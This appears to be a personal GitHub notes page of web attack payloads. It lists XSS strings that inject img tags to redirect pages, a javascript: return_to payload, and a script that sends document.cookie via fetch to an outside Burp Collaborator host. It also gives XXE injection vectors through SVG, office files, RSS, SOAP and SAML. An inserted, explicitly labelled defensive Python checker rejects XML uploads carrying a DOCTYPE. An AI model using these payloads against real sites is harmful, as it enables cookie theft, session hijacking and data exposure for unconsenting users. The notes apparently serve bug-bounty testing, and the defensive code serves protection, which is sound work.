anmolksachan / Payload

My Notes - Payload

XSS to Open Redirection Payload:

  1. http://Test"><img src=x onload=window.location="http://google.com">
  2. "><img src=x onerror=window.location="http://google.com">
  3. /auth/v2/login/signed_in?return_to=javascripT:alert(document/**/.domain);

Exfiltrate cookie:

<script>fetch('https://anmol.burpcollaborator.net?'+document.cookie, {method: 'POST',mode: 'no-cors',body:document.cookie});alert('exfiltrated the document.cookie');</script>

Multi XSS Exploit in Upload File

  1. Multi XSS Exploit in Upload File

Tiny XSS

  1. Tiny XSS by @terjanq

Server-Side input validation testing

  1. Server-Side input validation testing

XXE Techniques [Observations]

  1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml".
  2. If file uploads allow docx/xlsx/pdf/zip, unzip the package and add your evil XML code into the XML files.
  3. If SVG is allowed in picture upload, you can inject XML into SVGs.
  4. If the web app offers RSS feeds, add your malicious code into the RSS.
  5. Fuzz for the /soap API; some applications are still running SOAP APIs.
  6. If the target web app allows SSO integration, you can inject your malicious XML code into the SAML request/response.
  7. For more: A Deep Dive into XXE Injection
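
A defender-side check for the upload vectors in items 2-4 above, added here as an example and not part of the original notes: it rejects an uploaded SVG/RSS/XML file, or a zip-based office package, when any XML part carries a DOCTYPE. The names check_xml, scan_upload, sample_package, MAX_PART and the sample inputs are assumptions made for this example.

```python
import io
import zipfile
from xml.parsers import expat

MAX_PART = 10 * 1024 * 1024  # assumed per-part size limit, tune for your app

class DoctypeFound(Exception):
    pass

def check_xml(data):
    """Return None if clean, else 'doctype' or 'malformed'."""
    parser = expat.ParserCreate()
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeFound(name)  # stop at the DOCTYPE declaration
    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(data, True)  # a real parse, so encoding tricks cannot hide a DTD
    except DoctypeFound:
        return "doctype"
    except expat.ExpatError:
        return "malformed"
    return None

def scan_upload(filename, data):
    """Findings for a bare XML upload (SVG, RSS) or a zip/OOXML package."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        reason = check_xml(data)
        return [f"{filename}: {reason}"] if reason else []
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue  # only XML parts are parsed
            if info.file_size > MAX_PART:
                findings.append(f"{info.filename}: too large")
                continue
            reason = check_xml(zf.read(info))
            if reason:
                findings.append(f"{info.filename}: {reason}")
    return findings

# Constructed sample inputs (not from the page); the entity is internal and inert.
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="1"/></svg>'
DTD_SVG = b'<!DOCTYPE svg [<!ENTITY e "x">]><svg>&e;</svg>'

def sample_package():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b"<Types/>")
        zf.writestr("word/document.xml", DTD_SVG)
        zf.writestr("word/media/image1.png", b"\x89PNG")
    return buf.getvalue()
```

Run scan_upload on the raw upload bytes before handing the file to any document or image library; an empty list means no XML part declared a DOCTYPE.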

XXE OOB

  1. SOAP- Based Unauthenticated Out-of-Band XML External Entity (OOB-XXE) in a Help Desk Software
  2. Soap-based XXE vulnerability /soapserver/

Resources

  1. https://github.com/xsuperbug/payloads/blob/master/XSS%20-2
  2. https://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
